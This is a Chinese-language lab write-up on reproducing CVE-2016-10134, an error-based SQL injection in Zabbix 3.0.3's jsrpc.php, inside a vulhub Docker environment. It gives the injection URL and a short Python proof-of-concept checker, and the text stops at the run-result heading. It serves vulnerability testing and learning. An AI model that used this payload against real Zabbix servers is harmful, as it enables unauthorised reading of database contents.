环境搭建:
使用vulhub,进入对应文件夹启动环境:
[root@localhost CVE-2016-10134]# cd /home/vulhub/zabbix/CVE-2016-10134/
[root@localhost CVE-2016-10134]# docker-compose up -d
查看端口:
[root@localhost CVE-2016-10134]# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
186d17fe3db4 vulhub/zabbix:3.0.3-server "/docker-entrypoint.…" 37 seconds ago Up 35 seconds (health: starting) 162/udp, 10051/tcp cve-2016-10134_agent_1
61dac6a6b384 vulhub/zabbix:3.0.3-web "/docker-entrypoint.…" 37 seconds ago Up 35 seconds (healthy) 0.0.0.0:8080->80/tcp, :::8080->80/tcp cve-2016-10134_web_1
00cf5df981b0 mysql:5 "docker-entrypoint.s…" 39 seconds ago Up 38 seconds 3306/tcp, 33060/tcp cve-2016-10134_mysql_1
[root@localhost CVE-2016-10134]#
漏洞复现:
访问
http://192.168.10.10:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0,user()),0)
POC编写:
import requests
url = "http://192.168.10.10:8080/"
poc = "jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0,md5('wwwq')),0)"
res = requests.get(url + poc)
if "afece6b64dc8eff8b9bd078a5f" in res.text: # wwwq 的 md5 值
print("CVE-2016-10134 存在")
pycharm运行结果: